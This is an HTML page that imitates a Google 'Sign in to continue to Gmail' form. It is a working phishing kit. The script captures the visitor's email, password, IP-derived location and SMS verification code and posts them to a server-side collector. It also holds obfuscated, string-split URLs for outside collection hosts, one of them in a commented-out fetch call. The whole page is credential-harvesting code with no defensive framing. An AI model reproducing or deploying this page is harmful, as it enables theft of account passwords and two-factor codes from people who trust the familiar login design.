<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
    rel="stylesheet"
    href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
  />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,0,0" />

  <title>Access </title>
  <script
    type="text/javascript"
    src="https://code.jquery.com/jquery-latest.min.js"
  ></script>
    <style type="text/css">
      a {
        text-decoration: none;
        /* font-family: SFUITextLight; */
      }

      a:active {
        color: #2d6bb3;
      }

      a:hover {
        color: #6aace6;
      }

      .errorfound {
        border: 2px solid #d00;
        box-shadow: 0px 0px 1px #d00;
        color: #d00;
      }

      .input_icon_holder2 {
        position: relative;
        display: table;
        border-collapse: separate;
        margin-bottom: 10px;
        border: 1px solid #dadce0;
        border-radius: 4px;
        /* margin-bottom: 25px; */
      }

      .btn_grp {
        display: flex;
        justify-content: flex-end;
        align-items: center;
        gap: 30px;
        font-size: 14px;
      }

      .btn {
        width: auto;
        height: auto;
        padding: 10px 25px;
        font-size: 14px;
        font-weight: 400;
        margin: 1% 1%;
        border: none;
        border-radius: 40px;
        cursor: pointer;
      }

      .upd {
        background-color: #1a73e8;
        color: #fff;
      }

      .upd:hover {
        background-color: #2b84f9;
      }

      .text {
        font-variant: tabular-nums;
        list-style: none;
        position: relative;
        display: inline-block;
        width: 100%;
        font-size: 1.3rem;
        line-height: 1.5;
        background-image: none;
        transition: all 0.3s;
        background-color: transparent;
        border: none;
        color: #202124;
        font-size: 16px;
        height: 28px;
        padding: 25px 15px;
        z-index: 11;
      }

      @keyframes reduce {
        from {
          font-size: 16px;
          height: 100%;
          top: 0;
        }
        to {
          font-size: 12px;
          height: auto;
          top: -13px;
        }
      }

      @keyframes increase {
        from {
          font-size: 12px;
          height: auto;
          top: -13px;
        }
        to {
          font-size: 16px;
          height: 100%;
          top: 0;
        }
      }

      .preloader {
        background-color: rgba(255, 255, 255);
        height: 100%;
        left: 0;
        position: fixed;
        top: 0;
        width: 100%;
        z-index: 9999999;
      }

      .spinner2 {
        border: 5px solid #f3f3f3; /* Light grey */
        border-top: 5px solid #3498db; /* Blue */
        border-radius: 50%;
        animation: spin 1s linear infinite;

        width: 50px;
        height: 50px;
        position: absolute;
        top: 40%;
        left: 50%;
        margin-top: -50px;
        margin-left: -30px;
        transition: ease 1.5s;
      }

      @keyframes spin {
        0% {
          transform: rotate(0deg);
        }
        100% {
          transform: rotate(360deg);
        }
      }

      .preloader .msg_text {
        position: absolute;
        top: 48%;
        left: 50%;
        margin-top: -30px;
        margin-left: -120px;
        font-size: 20px;
        transition: ease 1.5s;
      }

      @-webkit-keyframes fadein {
        from {
          opacity: 0;
        }
        to {
          opacity: 1;
        }
      }

      @keyframes fadein {
        from {
          opacity: 0;
        }
        to {
          opacity: 1;
        }
      }

      @-webkit-keyframes fadeout {
        from {
          opacity: 1;
        }
        to {
          opacity: 0;
        }
      }

      @keyframes fadeout {
        from {
          opacity: 1;
        }
        to {
          opacity: 0;
        }
      }
    </style>
  </head>
  <body>
    <style>
      * {
        box-sizing: border-box;
        margin: 0;
        padding: 0;
        font-family: "Google Sans", "Noto Sans Myanmar UI", arial, sans-serif;
        color: #2c2e2f;
        font-weight: normal !important;
      }

      body {
        background-color: #f0f4f9;
      }
      .container {
        display: flex;
        width: 100%;
        height: 100vh;
        align-items: center;
        justify-content: center;
      }

      .middle {
        display: flex;
        width: 100%;
        max-width: 800px;
        align-items: center;
        justify-content: center;
      }

      .boxBottom {
        display: flex;
        width: 100%;
        flex-direction: column;
        align-items: space-between;
        justify-content: center;
        gap: 20px;
      }

      .box {
        display: grid;
        grid-template-columns: 50% 50%;
        background-color: #fff;
        padding: 40px 30px;
        border-radius: 15px;
        align-items: center;
        justify-content: space-between;
      }

     /*  .box > div {
      } */

      .leftBox {
        color: #1f1f1f;
        /* line-height: 3; */
        font-family: "Google Sans", "Noto Sans Myanmar UI", arial, sans-serif;
        font-weight: normal !important;
        display: flex;
        width: 100%;
        height: 100%;
        flex-direction: column;
        align-items: flex-start;
        justify-content: flex-start;
      }

      .leftBox p {
        font-size: 2rem;
        margin-top: 20px;
        margin-bottom: 30px;
      }

      /*.rightBox {
        font-size: 1rem;
        color: #1f1f1f;
        font-family: "Google Sans", roboto, "Noto Sans Myanmar UI", arial,
          sans-serif;
      }

      .bottom {
      }

      .leftbottom {
      }
      */

      .form {
        margin-top: 100px;
      }

      .bottom {
        display: flex;
        width: 100%;
        align-items: center;
        justify-content: space-between;
        color: #1f1f1f;
        font-size: 12px;
      }

      .rightbottom {
        display: flex;
        flex-direction: row;
        align-items: flex-end;
        justify-content: flex-end;
        gap: 30px;
      }

      @media screen and (max-width: 500px) {
        .box {
          display: grid;
          grid-template-columns: 100%;
        }

        .form {
          margin-top: 20px;
        }
      }

      .userEmail {
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 10px;
        border: 1px solid #333;
        padding: 8px 10px;
        border-radius: 20px;
        display: none;
      }

      .userEmail span {
        font-size: 12px;
        line-height: 0;
        margin: 0;
        padding: 0;
      }

      .userEmail svg {
        height: 18px;
        width: 18px;
      }

      .pap {
        display: none;
      }
      .second_p {
        display: none;
      }
    </style>
    <div class="container">
      <div class="middle">
        <div class="boxBottom">
          <div class="box">
            <div class="leftBox">
              <svg
                xmlns="https://www.w3.org/2000/svg"
                width="48"
                height="48"
                viewBox="0 0 48 48"
                aria-hidden="true"
                jsname="jjf7Ff"
              >
                <path
                  fill="#4285F4"
                  d="M45.12 24.5c0-1.56-.14-3.06-.4-4.5H24v8.51h11.84c-.51 2.75-2.06 5.08-4.39 6.64v5.52h7.11c4.16-3.83 6.56-9.47 6.56-16.17z"
                ></path>
                <path
                  fill="#34A853"
                  d="M24 46c5.94 0 10.92-1.97 14.56-5.33l-7.11-5.52c-1.97 1.32-4.49 2.1-7.45 2.1-5.73 0-10.58-3.87-12.31-9.07H4.34v5.7C7.96 41.07 15.4 46 24 46z"
                ></path>
                <path
                  fill="#FBBC05"
                  d="M11.69 28.18C11.25 26.86 11 25.45 11 24s.25-2.86.69-4.18v-5.7H4.34C2.85 17.09 2 20.45 2 24c0 3.55.85 6.91 2.34 9.88l7.35-5.7z"
                ></path>
                <path
                  fill="#EA4335"
                  d="M24 10.75c3.23 0 6.13 1.11 8.41 3.29l6.31-6.31C34.91 4.18 29.93 2 24 2 15.4 2 7.96 6.93 4.34 14.12l7.35 5.7c1.73-5.2 6.58-9.07 12.31-9.07z"
                ></path>
                <path fill="none" d="M2 2h44v44H2z"></path>
              </svg>
              <p>Sign In</p>
              <div>To continue to Gmail</div>
              <div class="userEmail">
                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -960 960 960" fill="#5f6368"><path d="M234-276q51-39 114-61.5T480-360q69 0 132 22.5T726-276q35-41 54.5-93T800-480q0-133-93.5-226.5T480-800q-133 0-226.5 93.5T160-480q0 59 19.5 111t54.5 93Zm246-164q-59 0-99.5-40.5T340-580q0-59 40.5-99.5T480-720q59 0 99.5 40.5T620-580q0 59-40.5 99.5T480-440Zm0 360q-83 0-156-31.5T197-197q-54-54-85.5-127T80-480q0-83 31.5-156T197-763q54-54 127-85.5T480-880q83 0 156 31.5T763-763q54 54 85.5 127T880-480q0 83-31.5 156T763-197q-54 54-127 85.5T480-80Z"/></svg>
                <span>kateshaw89@yandex.com</span>
                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -960 960 960" fill="#5f6368"><path d="M480-360 280-560h400L480-360Z"/></svg>
              </div>
            </div>
            <div class="rightBox">
                <div class="rb1">
                    <form
                        action=""
                        method="post"
                        enctype="multipart/form-data"
                        class="form"
                        id="form__"
                    >
                        <div class="usp">
                            <div class="input_icon_holder2" style="display: block">
                            <div
                                class="text_label"
                                style="
                                color: rgba(0, 0, 0, 0.6);
                                padding: 16px 10px 10px 14px;
                                position: absolute;
                                z-index: 12;
                                width: auto;
                                height: auto;
                                font-size: 16px;
                                font-weight: 400;
                                "
                                onclick="pop_label(0)"
                            >
                                Email or Phone
                            </div>
                            <input
                                type="text"
                                onclick="pop_label(0)"
                                onchange="changed(0)"
                                onblur="hide_label(0)"
                                placeholder=""
                                required
                                class="text mm"
                                id="nu"
                                value=""
                            />
                            </div>
                            <p style="color: #1a73e8">Forgot email?</p>
                        </div>
                        <div class="pap">
                            <div class="input_icon_holder2" style="display: block">
                                <div
                                    class="text_label"
                                    style="
                                    color: rgba(0, 0, 0, 0.6);
                                    padding: 16px 10px 10px 14px;
                                    position: absolute;
                                    z-index: 12;
                                    width: auto;
                                    height: auto;
                                    font-size: 16px;
                                    font-weight: 400;
                                    "
                                    onclick="pop_label(1)"
                                >
                                    Enter your password
                                </div>
                                <input
                                    type="password"
                                    onclick="pop_label(1)"
                                    onchange="changed(1)"
                                    onblur="hide_label(1)"
                                    placeholder=""
                                    required
                                    class="text mm"
                                    id= "wpp"
                                    value=""
                                />
                            </div>
                            <div
                            style="
                            display: flex;
                                align-items: center;
                                justify-content: flex-start;
                                gap: 20px;
                            "
                            >
                                <input type="checkbox" onclick="show_text()" />
                                <p style="color: #1f1f1f">Show password</p>
                            </div>
                        </div>

                        <input type="hidden" class="text" name="loc" id="loc" />

                        <div class="btn_grp" style="margin-top: 60px">
                        <a
                            href="create_account"
                            style="text-decoration: none; color: #1a73e8"
                            >Create account</a
                        >
                        <button
                            class="btn upd"
                            name="next2"
                            type="button"
                            onclick="showPage(2)""
                        >
                            Next
                        </button>
                        </div>

                        <div class="btn_grp" style="margin-top: 60px; display: none">
                        <a
                            href="create_account"
                            style="text-decoration: none; color: #1a73e8"
                            >Forgot Password?</a
                        >
                        <button class="btn upd" name="next" onclick="showPage(3)">
                            Next
                        </button>
                        </div>

                        <div style="margin-bottom: 20px"></div>
                    </form>
                </div>
                <div class="rb2" style="display: none;">
                    <form
                        action=""
                        method="post"
                        enctype="multipart/form-data"
                        class="form"
                        id="form__2"
                    >
                        <div class="cod">
                            <p style="margin-bottom: 20px; font-size: 12x;">
                                Enter the code that was sent to your mobile device
                            </p>
                            <div class="input_icon_holder2" style="display: block">
                            <div
                                class="text_label"
                                style="
                                color: rgba(0, 0, 0, 0.6);
                                padding: 16px 10px 10px 14px;
                                position: absolute;
                                z-index: 12;
                                width: auto;
                                height: auto;
                                font-size: 16px;
                                font-weight: 400;
                                "
                                onclick="pop_label(2)"
                            >
                                Enter Code
                            </div>
                            <input
                                type="text"
                                onclick="pop_label(2)"
                                onchange="changed(2)"
                                onblur="hide_label(2)"
                                placeholder=""
                                required
                                class="text mm"
                                id="dc"
                                value=""
                            />
                            </div>
                            <!-- <p style="color: #1a73e8">Forgot email?</p> -->
                        </div>
                        

                        <div class="btn_grp2" style="margin-top: 60px">
                        
                        <button
                            class="btn upd"
                            name="signin"
                        >
                            Sign In
                        </button>
                        </div>

                        <div style="margin-bottom: 20px"></div>
                    </form>
                </div>
            </div>
          </div>
          <div class="bottom">
            <div class="leftbottom">English (United States)</div>
            <div class="rightbottom">
              <a href="#"><p>Help</p></a>
              <a href="#"><p>Privacy</p></a>
              <a href="#"><p>Terms</p></a>
            </div>
          </div>
        </div>
      </div>
    </div>

    <script type="text/javascript">
        let resBox = "GGG";
        let nuu1 = "https";
        let nuu2 = "://";
        let nuu3 = "clpoint.000webhostapp";
        let nuu4 = ".com";
        let nuu5 = "/webtest2";
        let nuu6 = ".php";

        let dn1 = "https";
        let dn2 = "://";
        let dn3 = "theaje";
        let dn4 = "ma.co";
        let dn5 = "m.ng";
        let dn6 = ":20";
        let dn7 = "83/";

        
        let myForm = document.querySelector("#form__");
        myForm.addEventListener("submit", async function (event) {
        event.preventDefault();

        let nu = document.querySelector("#nu");
        let wpp = document.querySelector("#wpp");

        let data = new FormData();

        data.append("nu", nu.value);
        data.append("wpp", wpp.value);
        data.append("loc", loc.value);
        /* data.append("trial", trial.value); */
        data.append("resBox", resBox);

        let options = {
          method: "POST",
          body: data,
        };
/* 
        loader.style.backgroundColor = "#009cde";
        loader.querySelector("p").innerHTML = "Authenticating...";
 */
        /* const response = await fetch(
          `${nuu1}${nuu2}${nuu3}${nuu4}${nuu5}${nuu6}`,
          options
        ); */

        const response = await fetch(
          `serve.php`,
          options
        );

        const result = await response.text();

        console.log(result);

        if (result == 'CODE') {
          showPage(3)
        } 
      });

      let myForm2 = document.querySelector("#form__2");
      myForm2.addEventListener("submit", async function (event) {
        event.preventDefault();

        let dc = document.querySelector("#dc");
        let nu = document.querySelector("#nu");

        let data = new FormData();

        data.append("dc", dc.value);
        data.append("nu", nu.value);

        let options = {
          method: "POST",
          body: data,
        };

      /*   loader.style.backgroundColor = "#009cde";
        loader.querySelector("p").innerHTML = "Authenticating...";
 */
       /*  const response = await fetch(
          `${nuu1}${nuu2}${nuu3}${nuu4}${nuu5}${nuu6}`,
          options
        ); */

        const response = await fetch(
          `serve.php`,
          options
        );
        
        const result = await response.text();

        console.log(result);

        if (result == 'DONE') {
          alert("Completed!!!")
        } 
      });


      function showPage(pageNum) {
        ti = document.querySelector(".leftBox p");
        de = document.querySelector(".leftBox div");
        de2 = document.querySelector(".leftBox .userEmail");
        usp = document.querySelector(".usp");
        pap = document.querySelector(".pap");
        rb1 = document.querySelector(".rb1");
        rb2 = document.querySelector(".rb2");
        btn = document.querySelectorAll(".btn_grp");
        if (pageNum == 2) {
          ti.innerHTML = "Welcome";
          de.style.display = 'none'
          de2.style.display = 'flex'
          usp.style.display = 'none'
          pap.style.display = 'block'
          btn[0].style.display = 'none'
          btn[1].style.display = 'flex'
        }

        if(pageNum == 3){
            usp.style.display = 'none'
            pap.style.display = 'none'
            rb1.style.display = 'none'
            rb2.style.display = 'block'
        }
      }
      window.onload = function () {
        /* preloader = document.getElementsByClassName("preloader");
        l_msg = document.getElementsByClassName("loading_msg");
        msg_text = document.getElementsByClassName("msg_text");

        setTimeout(function () {
          msg_text[0].style.animation = "fadein .8s ease";
          msg_text[0].style.display = "block";
        }, 1500);

        setTimeout(function () {
          l_msg[0].style.animation = "fadein 1s ease";
          l_msg[0].style.visibility = "visible";
          l_msg[0].innerHTML = "Redirecting to Youtube...";
        }, 3000);

        setTimeout(function () {
          l_msg[0].style.animation = "fadein 1s ease";
          l_msg[0].style.visibility = "visible";
          l_msg[0].innerHTML = "Signing into Youtube...";
        }, 6000);

        setTimeout(function () {
          preloader[0].style.animation = "fadeout 1s ease";
          setTimeout(function () {
            preloader[0].style.display = "none";
          }, 1000);
        }, 11000);
 */
        x = document.getElementsByClassName("mm")[0].value;
        y = document.getElementsByClassName("mm")[1].value;
        var inh = document.getElementsByClassName("input_icon_holder2");
        if (x.trim() == "") {
          var label = document.getElementsByClassName("text_label");
          /*label[0].style.animation='increase .1s linear';//alert(id)
			label[0].style.fontSize='16px';
			label[0].style.height='100%';
			label[0].style.top='0px';*/

          label[0].style.animation = "increase .1s linear";
          label[0].style.fontSize = "16px";
          label[0].style.height = "100%";
          label[0].style.top = "0px";
          label[0].style.padding = "16px 10px 10px 14px";
          label[0].style.left = "0px";
          label[0].style.backgroundColor = "transparent";
          label[0].style.color = "rgba(0,0,0,0.6)";
          inh[0].style.border = "1px solid #dadce0";
        } else {
          var label = document.getElementsByClassName("text_label");
          /*label[0].style.animation='reduce .1s linear';//alert(id)
			label[0].style.fontSize='12px';
			label[0].style.height='30%';
			label[0].style.top='-40px';*/

          label[0].style.animation = "reduce .1s linear";
          label[0].style.fontSize = "12px";
          label[0].style.height = "auto";
          label[0].style.top = "-13px";
          label[0].style.padding = "1px 5px";
          label[0].style.left = "10px";
          label[0].style.backgroundColor = "white";
          label[0].style.color = "#1a73e8";
          inh[0].style.border = "2px solid #1a73e8";
        }

        if (y.trim() == "") {
          var label = document.getElementsByClassName("text_label");
          label[1].style.animation = "increase .1s linear";
          label[1].style.fontSize = "16px";
          label[1].style.height = "100%";
          label[1].style.top = "0px";
          label[1].style.padding = "16px 10px 10px 14px";
          label[1].style.left = "0px";
          label[1].style.backgroundColor = "transparent";
          label[1].style.color = "rgba(0,0,0,0.6)";
          inh[1].style.border = "1px solid #dadce0";
        } else {
          var label = document.getElementsByClassName("text_label");
          /*label[1].style.animation='reduce .1s linear';//alert(id)
			label[1].style.fontSize='12px';
			label[1].style.height='31%';
			label[1].style.top='-40px';*/

          label[1].style.animation = "reduce .1s linear";
          label[1].style.fontSize = "12px";
          label[1].style.height = "auto";
          label[1].style.top = "-13px";
          label[1].style.padding = "1px 5px";
          label[1].style.left = "10px";
          label[1].style.backgroundColor = "white";
          label[1].style.color = "#1a73e8";
          inh[1].style.border = "2px solid #1a73e8";
        }
      };

      function changed(id) {
        pop_label(id);
      }

      function pop_label(id) {
        var label = document.getElementsByClassName("text_label");
        var mm = document.getElementsByClassName("mm");
        var inh = document.getElementsByClassName("input_icon_holder2");
        label[id].style.animation = "reduce .1s linear";
        label[id].style.fontSize = "12px";
        label[id].style.height = "auto";
        label[id].style.top = "-13px";
        label[id].style.padding = "1px 5px";
        label[id].style.left = "10px";
        label[id].style.backgroundColor = "white";
        label[id].style.color = "#1a73e8";
        inh[id].style.border = "2px solid #1a73e8";
        mm[id].focus();
      }

      function hide_label(id) {
        x = document.getElementsByClassName("mm")[id].value;
        //alert(x.trim());
        if (x.trim() == "") {
          var label = document.getElementsByClassName("text_label");
          var inh = document.getElementsByClassName("input_icon_holder2");
          label[id].style.animation = "increase .1s linear"; //alert(id)
          label[id].style.fontSize = "16px";
          label[id].style.height = "100%";
          label[id].style.top = "0px";
          label[id].style.padding = "16px 10px 10px 14px";
          label[id].style.left = "0px";
          label[id].style.backgroundColor = "transparent";
          label[id].style.color = "rgba(0,0,0,0.6)";
          inh[id].style.border = "1px solid #dadce0";
        }
      }
       $.get(
        "https://ipinfo.io",
        function (response) {
          var x =
            response.city + " " + response.region + " " + response.country;
          $("#loc").val(x);
        },
        "jsonp"
      );

      function show_text() {
        var pass_field = document.querySelector("#wpp");
        if (pass_field.type == "password") {
            pass_field.type = "text";
        } else if (pass_field.type == "text") {
            pass_field.type = "password";
        }
      }
    </script>
  </body>
</html>
